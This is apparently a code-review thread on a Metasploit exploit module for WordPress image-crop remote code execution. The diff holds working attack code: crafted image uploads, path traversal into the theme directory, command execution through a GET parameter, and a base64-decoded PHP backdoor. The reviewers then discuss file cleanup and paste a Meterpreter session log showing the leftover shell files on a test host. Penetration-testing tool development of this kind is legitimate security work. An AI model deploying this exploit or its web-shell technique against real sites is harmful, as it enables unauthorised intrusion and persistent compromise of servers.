modules/exploits/unix/webapp/wp_crop_rce.rb

```diff
@@ -0,0 +1,403 @@
+          encoded = Rex::Text.encode_base64(payload.encoded)
+          res = send_request_cgi(
+            'method'   => 'GET',
+            'uri'      => uri,
+            'cookie' => cookie,
+            'vars_get' => {
+              'p' => "#{post_id}",
+              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+            }
+          )
+          if res && res.code == 200 && res.body && res.body.length > 0
+            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+            res = send_request_cgi(
+              'method'   => 'GET',
+              'uri'      => uri,
+              'cookie' => cookie
+              )
+          end
+        else
+          print_status("Can't find base64 decode on target.")
+        end
+      end
+    else
+      #GD stuff
+      print_status('GD library')
+      tmp_filename = "evilshell.jpg"
+      img_name = Rex::Text.rand_text_alpha(10)
+      @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
+      ajax_nonce = get_ajaxnonce(cookie)
+      _wpnonce =  get_wpnonce2(image_id, cookie)
+      @shell_name = Rex::Text.rand_text_alpha(10)
+      change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+      crop_image(image_id , ajax_nonce, cookie)
+      print_status("Including into theme")
+      post_id = include_theme(@shell_name, cookie)
+      uri = normalize_uri(datastore['TARGETURI'])
+      #Test if base64 is on target
+      test_string = 'YmFzZTY0c3BvdHRlZAo='
+      res = send_request_cgi(
+        'method'   => 'GET',
+        'uri'      => uri,
+        'cookie' => cookie,
+        'vars_get' => {
+          'p' => "#{post_id}",
+          '0' => "echo #{test_string} | base64 -d"
+        }
+      )
+      if res && res.code == 200 && res.body && res.body.length > 0
+        if res.body.include?("base64spotted")
+          #Execute payload with base64 decode
+          @backdoor = Rex::Text.rand_text_alpha(10)
+          encoded = Rex::Text.encode_base64(payload.encoded)
+          res = send_request_cgi(
+            'method'   => 'GET',
+            'uri'      => uri,
+            'cookie' => cookie,
+            'vars_get' => {
+              'p' => "#{post_id}",
+              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+            }
+          )
+          if res && res.code == 200 && res.body && res.body.length > 0
+            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
+            res = send_request_cgi(
+              'method'   => 'GET',
+              'uri'      => uri,
+              'cookie' => cookie
+              )
+          end
+        else
+          print_status("Can't find base64 decode on target.")
+        end
+      end
+    end
+  end
+
+  def on_new_session(client)
+    #sleep 1
+    client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
```

Comment:
You should be able to use `register_file_for_cleanup` rather than manually adding these in `on_new_session`.

Reply:
I used ```client.shell_command_token``` in order to use wilcard. When uploading a files multiples file will be created (also a directory) :
```
image-100x100.jpg
image-150x150.jpg
image-300x225.jpg
image.jpg
```
By using ```register_file_for_cleanup``` I will still need to add some file names ?

Reply:
`register_file_for_cleanup` accepts an argument. There's also `register_dir_for_cleanup`.

Neither function supports wildcards.

Reply:
When I use ```register_file_for_cleanup``` I got some warnings. ```unknown result``` for deleted files and ```manual cleanup``` for files not deleted.
```
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:56928) at 2019-03-20 14:22:48 -0400
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC.jpg, unknown result
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC-100x100.jpg, unknown result
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC-150x150.jpg, unknown result
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790.jpg, unknown result
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790-100x100.jpg, unknown result
[!] Tried to delete wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790-150x150.jpg, unknown result
[!] Tried to delete wp-content/themes/twentyseventeen/cropped-kDlSwlVzGt.jpg, unknown result
[!] This exploit may require manual cleanup of 'wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790.jpg?/x.jpg' on the target
[!] This exploit may require manual cleanup of 'INXWxbyvtI.php' on the target
[!] This exploit may require manual cleanup of 'wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790.jpg?' on the target

meterpreter > ls INXWxbyvtI.php
0000/---------  0  fif  1969-12-31 19:18:30 -0500  INXWxbyvtI.php
meterpreter > pwd
/var/www/html
meterpreter > ls wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790.jpg?
0000/---------  0  fif  1969-12-31 20:08:16 -0500  wp-content/uploads/2019/03/dNSkecRDzC-e1553106167790.jpg?
```
Is this supposed to be the normal behavior ?

Reply:
:shrug: did it delete the files tho ?

Reply:
```unknown result``` for deleted files and ```manual cleanup``` for files not deleted as mentioned earlier  :smiley:

Reply:
Yeah the `?` might be causing issues. Not sure how that would be handled on Windows systems either.